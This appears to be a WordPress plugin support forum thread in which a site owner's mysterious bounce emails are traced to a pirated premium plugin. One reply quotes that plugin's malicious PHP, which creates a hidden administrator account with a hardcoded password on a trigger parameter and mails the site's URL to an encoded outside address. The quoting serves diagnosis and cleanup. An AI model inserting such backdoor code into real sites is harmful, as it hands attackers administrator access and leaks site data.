Getting PHP header/script errors occasionally

I see what it is. Spelling mistake (chkafrica vrs chkAfrica) Please uncheck Africa under the Protection Items submenu.

I will fix this, and as soon as I test it, I will put it out on WordPress.

Keith

hi
i keep receiving many rogue mails on my mails box(yahoo.fr) despite the fact that i installed the plugin STOP SPAMMER.is it due to the Captcha? how to delete the malware?
thanks
daniel
https://www.apsaraventure.com

See example of rogue mail below:

This is an automatically generated Delivery Status Notification

THIS IS A WARNING MESSAGE ONLY.

YOU DO NOT NEED TO RESEND YOUR MESSAGE.

Delivery to the following recipient has been delayed:

[email protected]

Message will be retried for 2 more day(s)

—– Original message —–

X-Received: by 10.194.120.230 with SMTP id lf6mr44190034wjb.78.1428452521189;
Tue, 07 Apr 2015 17:22:01 -0700 (PDT)
Return-Path: <[email protected]>
Received: from nm6-vm8.bullet.mail.ir2.yahoo.com (nm6-vm8.bullet.mail.ir2.yahoo.com. [212.82.96.124])
by mx.google.com with ESMTPS id y14si6508695wju.139.2015.04.07.17.22.01
for <[email protected]>
(version=TLSv1 cipher=ECDHE-RSA-RC4-SHA bits=128/128);
Tue, 07 Apr 2015 17:22:01 -0700 (PDT)
Received-SPF: none (google.com: [email protected] does not designate permitted sender hosts) client-ip=212.82.96.124;
Authentication-Results: mx.google.com;
spf=none (google.com: [email protected] does not designate permitted sender hosts) [email protected];

Someone is sending email from your website. The email is going to a gmail.com id and it appears to be from you. It looks like the mail is being sent from your yahoo mailbox, although I can’t be sure.

The email bounced and was rejected by gmail for some reason. The email server at yahoo retries this many times, delaying a few days each time and as a result you receive the bounce message above regularly

Stop spammers would only send mail to you.

Stop Spammers does not generate this kind of email. To be sure, on the stop spammers/challenge sub menu in wordpress you can uncheck the email box so you are not notified.

It looks like spammers are registering with invalid email and the registration message bounces.

You need to figure out how the spammers are slipping past the plugin. The jetpack plugin registration using a WordPress Id lets users in because all they have to do is register at WordPress and the plugin doesn’t check them. I am working on a fix for this.

Keith

Hello Keith
thanks first for your detailed explanation. i am not well-versed in website managment (i am not webmaster) so i appreciate that you assist me.
so you say that mails are sent from my website. what’s the point to do that?i observe that i get rogue mails since i installed a contact form7 and Postman plugin + very simple Captcha.
Hopeless, i did one thing : i removed the Very simple Captcha from my website coz i suspect it to be vulnerable to attacks.
i was thinking of installing another type of Captcha plugin(more efficient) so i went to the customize window on Contact from 7, and there i saw a message ” you MUST install Very simple Captcha” again!but i hvae removed it so it means WP doen’s give me the freedom to choose the Captcha i want.
do u know how it works?
thanks
daniel

keith
1.
i went to Challenge and deny options on top spammers and there is this:
“By default the plugin will support OpenCaptcha which is OK. For better results I have included the ability to use Google’s ReCaptcha, or you can try SolveMedia’s captcha using ads which can provide a revenue stream”.

so it means that i could install Google’s Recaptcha.
what do you think? will it be more efficient than Very simple Captcha?
how to install Google’s Recaptcha?

2.in the stop spammers/challenge sub menu in wordpress, you can uncheck the email box so you are not notified. question: Does it means that i have to put the rogue mail email address somewhere in a box in challenge sub menu? if yes where? sorry to ask, but i am new on WP
thanks
daniel

@kpgraham, two days ago I pointed out to @bangkok108 that these emails result from malware he installed on his system, a pirated version of a premium plugin called “ubermenu-skins-flat” which had the following code:

add_action('wp_head', 'wp_func_ta51');
function wp_func_ta51() {
	If ($_GET['cms'] == 'go') {
		require('wp-includes/registration.php');
	If (!username_exists('wordpress')) {
		$user_id = wp_create_user('wordpress', '6b6TkpF9bJ');
		$user = new WP_User($user_id);
		$user->set_role('administrator');
	}

and

add_action('wp_head','my_wpfunww416');
function my_wpfunww416(){
	if(!username_exists('wordpress')){
		$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");
		$vari='WordPress Plugin';
		wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));
	}
}

amFxcXNjaWdzQGdtYWlsLmNvbQ== decoded is [email protected], which is the source of Daniel’s troubles.

I was able to track down the malware thanks to this fantastic article: https://blog.sucuri.net/2014/03/unmasking-free-premium-wordpress-plugins.html

Further, as Daniel’s email log shows ~200 of these emails attempts were made, I also told him that he would have to endure a minimum of 200 delivery failure messages from Yahoo, despite the fact that the malware was quarantined and removed two days ago.

Daniel’s issue has nothing to do with spam or his contact form.

bangkok108,

The captcha on Stop Spammers only displays when the plugin thinks there is a spammer. It does not display on ordinary comments and registrations.

Keith

Postman SMTP,

Thanks for the comment and the great link. Stop Spammers has a simple threat scan that looks for eval and other suspicious things in the WP install. I got some good ideas on how to improve the scan.

Keith

Thanks,

WP is complicated and often with non-English speakers, it is difficult to trace down the real problem. I appreciate your intervention.

Thanks for the link. The stop spammers plugin has a very simple scan for malicious code patterns and I modified it slightly because of information in the article.

Keith P. Graham

Keith

Thanks so much for the quick response. I plan to make a donation ASAP. Keep up the great work!

GC

PS – I’m Kelli Paugh, by the way, so you’ll make the connection when you get the contribution. Thanks again!

I never know how to respond to the occasional hit on paypal.

One thing I like to do is gather up all the emails once every few months and ask for a link that I can put on my blog roll so you at least get a back-link in return for your kindness.

Send me a link.

thanks,

Keith

Hi
i sincerely appreciate Jason, KPgraham and Keith assistance for giving detailed explanations concerning a matter that is unknow to me.
if you come to Thailand where i live, send me a message.
daniel

I may add code to Postman that dumps the email if the recipient address is [email protected], or other known malware addresses to prevent this kind of thing in the future.

Postman SMTP,

It wouldn’t hurt to add this email, but then you don’t want to be in the business of maintaining lists of bad email addresses.

If you wanted to be complete secure, you might do a quick email lookup on Akismet or StopForumSpam. But again, that is not the business of your plugin.

I think I remember a hook in sendmail routines in WP, perhaps that needs to be monitored by a plugin that checks for spam going out, rather than spam coming in. It sounds like a new project for someone.

Keith